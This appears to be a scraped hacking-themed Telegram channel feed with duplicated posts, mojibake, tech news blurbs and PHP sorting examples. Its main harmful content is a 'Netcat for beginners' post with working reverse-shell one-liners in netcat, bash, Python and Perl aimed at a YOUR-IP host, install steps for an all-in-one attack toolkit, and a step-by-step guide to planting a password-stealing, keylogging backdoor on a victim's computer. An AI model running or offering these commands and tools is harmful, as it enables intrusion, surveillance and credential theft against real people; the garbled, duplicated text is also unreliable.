Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Some recommended courses:
A) PARROT HACKING:
https://www.youtube.com/watch?v=z4WN0sHLUWU
1 Hour
https://www.youtube.com/watch?v=hrgwhNoBbdg
38 min
https://www.youtube.com/watch?v=3Kq1MIfTWCE&list=PLYp_kdhy40RzoqGfYCLVnW8TGNIn0XZtu&index=2
15 hours
B) KALI FOR BEGINERS :
https://www.youtube.com/watch?v=lZAoFs75_cs
2 H
https://www.youtube.com/watch?v=3Kq1MIfTWCE
14 h
https://www.youtube.com/watch?v=i7nBw-5NdPU
1 H
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Some recommended courses:
A) PARROT HACKING:
https://www.youtube.com/watch?v=z4WN0sHLUWU
1 Hour
https://www.youtube.com/watch?v=hrgwhNoBbdg
38 min
https://www.youtube.com/watch?v=3Kq1MIfTWCE&list=PLYp_kdhy40RzoqGfYCLVnW8TGNIn0XZtu&index=2
15 hours
B) KALI FOR BEGINERS :
https://www.youtube.com/watch?v=lZAoFs75_cs
2 H
https://www.youtube.com/watch?v=3Kq1MIfTWCE
14 h
https://www.youtube.com/watch?v=i7nBw-5NdPU
1 H
β β β Uππ»βΊπ«Δπ¬πβ β β β
YouTube
Hacking with Parrot Security OS
Kali Linux is famous for being the go-to operating system for hackers, but there are other operating systems out there targeting security researchers too. Parrot Security OS is another well-known Debian based Linux system for hackers, and we'll try settingβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦UPDATED HACK ANDROID/WEB/SNIFF/WIFI /MUCH MORE...
Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKERPRO
Information Gathering:
Nmap
Setoolkit
Port Scanning
Host To IP
wordpress user
CMS scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips
Password Attacks:
Cupp
Ncrack
Wireless Testing:
reaver
pixiewps
Fluxion
Exploitation Tools:
ATSCAN
sqlmap
Shellnoob
commix
FTP Auto Bypass
jboss-autopwn
Sniffing & Spoofing:
Setoolkit
SSLtrip
pyPISHER
SMTP Mailer
Web Hacking:
Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework
Private Web Hacking:
Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
ports Scan (common ports)
Get server Info
Bypass Cloudflare
Post Exploitation:
Shell Checker
POET
Weeman
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) Installation in Linux :
1) Open Terminal and Type : git clone https://github.com/jaykali/hackerpro.git
2) After Downloading The File Type : sudo cd hackerpro && sudo python2 hackerpro.py
B) Installation in Android :
1st Download Termux
1) Then Open Termux and Type : apt update && apt upgrade && apt install git && apt install python2
2) After That Open Termux and Type : git clone https://github.com/jaykali/hackerpro.git
3) Then Type : cd hackerpro && python2 hackerpro.py
After install choose options with numbers,simple to use
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦UPDATED HACK ANDROID/WEB/SNIFF/WIFI /MUCH MORE...
Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKERPRO
Information Gathering:
Nmap
Setoolkit
Port Scanning
Host To IP
wordpress user
CMS scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips
Password Attacks:
Cupp
Ncrack
Wireless Testing:
reaver
pixiewps
Fluxion
Exploitation Tools:
ATSCAN
sqlmap
Shellnoob
commix
FTP Auto Bypass
jboss-autopwn
Sniffing & Spoofing:
Setoolkit
SSLtrip
pyPISHER
SMTP Mailer
Web Hacking:
Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework
Private Web Hacking:
Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
ports Scan (common ports)
Get server Info
Bypass Cloudflare
Post Exploitation:
Shell Checker
POET
Weeman
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) Installation in Linux :
1) Open Terminal and Type : git clone https://github.com/jaykali/hackerpro.git
2) After Downloading The File Type : sudo cd hackerpro && sudo python2 hackerpro.py
B) Installation in Android :
1st Download Termux
1) Then Open Termux and Type : apt update && apt upgrade && apt install git && apt install python2
2) After That Open Termux and Type : git clone https://github.com/jaykali/hackerpro.git
3) Then Type : cd hackerpro && python2 hackerpro.py
After install choose options with numbers,simple to use
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - jaykali/hackerpro: All in One Hacking Tool for Linux & Android (Termux). Make your linux environment into a Hacking Machine.β¦
All in One Hacking Tool for Linux & Android (Termux). Make your linux environment into a Hacking Machine. Hackers are welcome in our blog - jaykali/hackerpro
Forwarded from UNDERCODE NEWS
The 2021 hot infrastructure technologies chosen by five specialists, the Grand Prix that exceeded the M1 chip.
#Analytiques
#Analytiques
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME PHP BASICS TIPS :
1) Sort array based on string keys (default)
The following example shows the use of ksort() without an optional argument.
First, create a PHP file with the following script. One dimensional associative array of four elements are declared in the script. Here, the ksort() function is used to sort the array based on the key values in ascending order. If no optional argument is used in the ksort() function, then it will sort the array normally. Next, the foreach loop is used to print the sorted array with keys and values.
<?php
//Declare an associative array
$clients = array("c4089"=>"Mehrab Hossain", "c1289"=>"Munir Chowdhury", "c2390"=>"Meena Rahman", "c1906"=>"Roksana Kamal");
//Apply default ksort()
ksort($clients);
echo "<h2>The sorted array values are:</h2>";
//Print the array values after sort
foreach ($clients as $key => $value) {
echo "$key = $value<br />";
}
?>
Output:
The following output will appear after running the script from the server. The output shows that the key values of the array are sorted.
2) Example 2: Sort array based on numeric keys
The following example shows the way to sort the one-dimensional numeric array using the ksort() function.
First, create a PHP file with the following script. Here, an associative array of four elements is declared, where the key values of the array are numeric. 1 is used as the optional argument value of ksort() in the script that is used to sort an array based on numeric key values. Next, a foreach loop is used to print the sorted array.
<?php
//Declare an associative array
$items = array(89564=>"Monitor", 98765=>"Mouse", 34234=>"Printer", 18979=>"Scanner");
//Apply ksort() with optional argument value 1
ksort($items, 1);
echo "<h2>The sorted array values are:</h2>";
//Print the array values after sort
foreach ($items as $key => $value) {
echo "$key = $value<br />";
}
?>
Output:
The following output will appear after running the script from the server. The output shows the array keys and values after sorting the array based on numeric key values.
linux mint
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME PHP BASICS TIPS :
1) Sort array based on string keys (default)
The following example shows the use of ksort() without an optional argument.
First, create a PHP file with the following script. One dimensional associative array of four elements are declared in the script. Here, the ksort() function is used to sort the array based on the key values in ascending order. If no optional argument is used in the ksort() function, then it will sort the array normally. Next, the foreach loop is used to print the sorted array with keys and values.
<?php
//Declare an associative array
$clients = array("c4089"=>"Mehrab Hossain", "c1289"=>"Munir Chowdhury", "c2390"=>"Meena Rahman", "c1906"=>"Roksana Kamal");
//Apply default ksort()
ksort($clients);
echo "<h2>The sorted array values are:</h2>";
//Print the array values after sort
foreach ($clients as $key => $value) {
echo "$key = $value<br />";
}
?>
Output:
The following output will appear after running the script from the server. The output shows that the key values of the array are sorted.
2) Example 2: Sort array based on numeric keys
The following example shows the way to sort the one-dimensional numeric array using the ksort() function.
First, create a PHP file with the following script. Here, an associative array of four elements is declared, where the key values of the array are numeric. 1 is used as the optional argument value of ksort() in the script that is used to sort an array based on numeric key values. Next, a foreach loop is used to print the sorted array.
<?php
//Declare an associative array
$items = array(89564=>"Monitor", 98765=>"Mouse", 34234=>"Printer", 18979=>"Scanner");
//Apply ksort() with optional argument value 1
ksort($items, 1);
echo "<h2>The sorted array values are:</h2>";
//Print the array values after sort
foreach ($items as $key => $value) {
echo "$key = $value<br />";
}
?>
Output:
The following output will appear after running the script from the server. The output shows the array keys and values after sorting the array based on numeric key values.
linux mint
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Leaked test results reveal that the multi-core performance of the Samsung Exynos 1080 is faster than the Snapdragon 8888.
#Leaks
#Leaks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Netcat FOR BEGINERS :
Netcat is a Unix utility that allows you to establish TCP and UDP connections, receive data from there, and transfer it.
Despite its usefulness and simplicity, many do not know how to use it and undeservedly bypass it.
With this utility, you can perform some of the penetration testing steps.
This can be useful when there are no packages installed on the attacked machine (or will attract attention), there are restrictions (for example, IoT / Embedded devices), etc.
What can be done with netcat:
Scan ports;
Forward ports;
Collect service banners;
Watch listening ports (binding for reverse connection);
Download and upload files;
Display raw HTTP content;
Create a mini chat.
In general, some unix utilities can be replaced with netcat, so this tool can be thought of as a kind of harvester for performing certain tasks.
$ nc -nvlp 443
This command opens TCP port 443 on all interfaces, and this port will be used further in the examples.
Netcat
$ nc -e / bin / sh YOUR-IP 443
In my opinion, this is the most classic example of a reverse shell, but in modern realities netcat may simply not be installed on the server.
Bash
$ bash -i> & / dev / tcp / YOUR-IP / 443 0> & 1
* And this example, in my opinion, is the most dangerous, because in fact, apart from the bash interpreter (sh, ksh, zsh, etc.), it does not require any additional software, but only access to the dev subsystem.
Python
$ python -c 'import socket, subprocess, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect ((" YOUR-IP ", 443 )); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call ([β/ bin / shβ, β- iβ]); '
* Modern distributions of Python are almost always present, and the standard library is sufficient to do the reverse linking.
Perl
$ perl -e 'use Socket; $ i = " YOUR-IP "; $ p = 443; socket (S, PF_INET, SOCK_STREAM, getprotobyname (βtcpβ)); if (connect (S, sockaddr_in ($ p, inet_aton ($ i)))) {open (STDIN, β> & Sβ); open (STDOUT, β> & Sβ); open (STDERR, β> & Sβ); exec (β/ bin / sh -iβ); }; '
* Like Python, almost all modern Linux distributions have Perl on their system.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Netcat FOR BEGINERS :
Netcat is a Unix utility that allows you to establish TCP and UDP connections, receive data from there, and transfer it.
Despite its usefulness and simplicity, many do not know how to use it and undeservedly bypass it.
With this utility, you can perform some of the penetration testing steps.
This can be useful when there are no packages installed on the attacked machine (or will attract attention), there are restrictions (for example, IoT / Embedded devices), etc.
What can be done with netcat:
Scan ports;
Forward ports;
Collect service banners;
Watch listening ports (binding for reverse connection);
Download and upload files;
Display raw HTTP content;
Create a mini chat.
In general, some unix utilities can be replaced with netcat, so this tool can be thought of as a kind of harvester for performing certain tasks.
$ nc -nvlp 443
This command opens TCP port 443 on all interfaces, and this port will be used further in the examples.
Netcat
$ nc -e / bin / sh YOUR-IP 443
In my opinion, this is the most classic example of a reverse shell, but in modern realities netcat may simply not be installed on the server.
Bash
$ bash -i> & / dev / tcp / YOUR-IP / 443 0> & 1
* And this example, in my opinion, is the most dangerous, because in fact, apart from the bash interpreter (sh, ksh, zsh, etc.), it does not require any additional software, but only access to the dev subsystem.
Python
$ python -c 'import socket, subprocess, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect ((" YOUR-IP ", 443 )); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call ([β/ bin / shβ, β- iβ]); '
* Modern distributions of Python are almost always present, and the standard library is sufficient to do the reverse linking.
Perl
$ perl -e 'use Socket; $ i = " YOUR-IP "; $ p = 443; socket (S, PF_INET, SOCK_STREAM, getprotobyname (βtcpβ)); if (connect (S, sockaddr_in ($ p, inet_aton ($ i)))) {open (STDIN, β> & Sβ); open (STDOUT, β> & Sβ); open (STDERR, β> & Sβ); exec (β/ bin / sh -iβ); }; '
* Like Python, almost all modern Linux distributions have Perl on their system.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Enjoy Today's list of free pro Android applications and games(Google Play) of the day is amazing.
#Updates
#Updates
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BetterBackdoor can create and control a backdoor.
F E A T U R E S :
Execute command line commands
Run PowerShell scripts
Run DuckyScripts to input keystrokes
Exfiltrate files based on extension
Exfiltrate Microsoft Edge and WiFi Passwords
Send and receive files to the victim's computer
Run KeyLogger
Get a screenshot of the victim's computer
Get text copied to victim's clipboard
Get the contents of the victim's file (cat)
This backdoor uses a client-server socket connection for communication.
The attacker starts the server and the victim connects to that server as a client.
Once the connection is established, commands can be sent to the client to control the backdoor.
To create a backdoor, BetterBackdoor:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Download: https://github.com/ThatcherDev/
1) Create "run.jar", the backdoor jar file, and copy it to the "backdoor" directory.
2) D obavte text file containing IPv4-address of the server to the Β«run.jarΒ».
Optionally copy the Java Runtime Environment to "backdoor" and create a batch file "run.bat" to run the backdoor in the packaged Java Runtime Environment.tterBackdoor:
3) To run the backdoor on the victim's computer, transfer all files from the "backdoor" directory to the victim's computer.
4) If the JRE is packaged with a backdoor, run run.bat, otherwise run run.jar.
5) This will launch a backdoor on the victim's computer.
6) Once launched, to control the backdoor, you must go back to BetterBackdoor and run option 1 at startup, connected to the same Wi-Fi network as the victim's computer.
π¦BetterBackdoor can create and control a backdoor.
F E A T U R E S :
Execute command line commands
Run PowerShell scripts
Run DuckyScripts to input keystrokes
Exfiltrate files based on extension
Exfiltrate Microsoft Edge and WiFi Passwords
Send and receive files to the victim's computer
Run KeyLogger
Get a screenshot of the victim's computer
Get text copied to victim's clipboard
Get the contents of the victim's file (cat)
This backdoor uses a client-server socket connection for communication.
The attacker starts the server and the victim connects to that server as a client.
Once the connection is established, commands can be sent to the client to control the backdoor.
To create a backdoor, BetterBackdoor:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Download: https://github.com/ThatcherDev/
1) Create "run.jar", the backdoor jar file, and copy it to the "backdoor" directory.
2) D obavte text file containing IPv4-address of the server to the Β«run.jarΒ».
Optionally copy the Java Runtime Environment to "backdoor" and create a batch file "run.bat" to run the backdoor in the packaged Java Runtime Environment.tterBackdoor:
3) To run the backdoor on the victim's computer, transfer all files from the "backdoor" directory to the victim's computer.
4) If the JRE is packaged with a backdoor, run run.bat, otherwise run run.jar.
5) This will launch a backdoor on the victim's computer.
6) Once launched, to control the backdoor, you must go back to BetterBackdoor and run option 1 at startup, connected to the same Wi-Fi network as the victim's computer.
(don't clone our tips)β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
In Europe, Samsung is entering the 5G race to overtake Huawei, but consumers have big reservations
#Technologies
#Technologies
Forwarded from UNDERCODE NEWS
To try live streaming, Walmart partnered up with TikTok, recommending fashion designer items.
#Updates
#Updates
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Recommended free Threat intelligence and IOC resources
* [FireEye IOCs](https://github.com/fireeye/iocs) - Indicators of Compromise
shared publicly by FireEye.
* [FireHOL IP Lists](https://iplists.firehol.org/) - Analytics for 350+ IP lists
with a focus on attacks, malware and abuse. Evolution, Changes History,
Country Maps, Age of IPs listed, Retention Policy, Overlaps.
* [HoneyDB](https://riskdiscovery.com/honeydb) - Community driven honeypot sensor data collection and aggregation.
* [hpfeeds](https://github.com/rep/hpfeeds) - Honeypot feed protocol.
* [Infosec - CERT-PA lists](https://infosec.cert-pa.it/analyze/statistics.html) ([IPs](https://infosec.cert-pa.it/analyze/listip.txt) - [Domains](https://infosec.cert-pa.it/analyze/listdomains.txt) - [URLs](https://infosec.cert-pa.it/analyze/listurls.txt)) - Blocklist service.
* [InQuest REPdb](https://labs.inquest.net/repdb) - Continuous aggregation of IOCs from a variety of open reputation sources.
* [InQuest IOCdb](https://labs.inquest.net/iocdb) - Continuous aggregation of IOCs from a variety of blogs, Github repos, and Twitter.
* [Internet Storm Center (DShield)](https://isc.sans.edu/) - Diary and
* [SystemLookup](https://www.systemlookup.com/) - SystemLookup hosts a collection of lists that provide information on
the components of legitimate and potentially unwanted programs.
* [ThreatMiner](https://www.threatminer.org/) - Data mining portal for threat
intelligence, with search.
* [threatRECON](https://threatrecon.co/) - Search for indicators, up to 1000
free per month.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Recommended free Threat intelligence and IOC resources
* [FireEye IOCs](https://github.com/fireeye/iocs) - Indicators of Compromise
shared publicly by FireEye.
* [FireHOL IP Lists](https://iplists.firehol.org/) - Analytics for 350+ IP lists
with a focus on attacks, malware and abuse. Evolution, Changes History,
Country Maps, Age of IPs listed, Retention Policy, Overlaps.
* [HoneyDB](https://riskdiscovery.com/honeydb) - Community driven honeypot sensor data collection and aggregation.
* [hpfeeds](https://github.com/rep/hpfeeds) - Honeypot feed protocol.
* [Infosec - CERT-PA lists](https://infosec.cert-pa.it/analyze/statistics.html) ([IPs](https://infosec.cert-pa.it/analyze/listip.txt) - [Domains](https://infosec.cert-pa.it/analyze/listdomains.txt) - [URLs](https://infosec.cert-pa.it/analyze/listurls.txt)) - Blocklist service.
* [InQuest REPdb](https://labs.inquest.net/repdb) - Continuous aggregation of IOCs from a variety of open reputation sources.
* [InQuest IOCdb](https://labs.inquest.net/iocdb) - Continuous aggregation of IOCs from a variety of blogs, Github repos, and Twitter.
* [Internet Storm Center (DShield)](https://isc.sans.edu/) - Diary and
* [SystemLookup](https://www.systemlookup.com/) - SystemLookup hosts a collection of lists that provide information on
the components of legitimate and potentially unwanted programs.
* [ThreatMiner](https://www.threatminer.org/) - Data mining portal for threat
intelligence, with search.
* [threatRECON](https://threatrecon.co/) - Search for indicators, up to 1000
free per month.
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mandiant/iocs: FireEye Publicly Shared Indicators of Compromise (IOCs)
FireEye Publicly Shared Indicators of Compromise (IOCs) - GitHub - mandiant/iocs: FireEye Publicly Shared Indicators of Compromise (IOCs)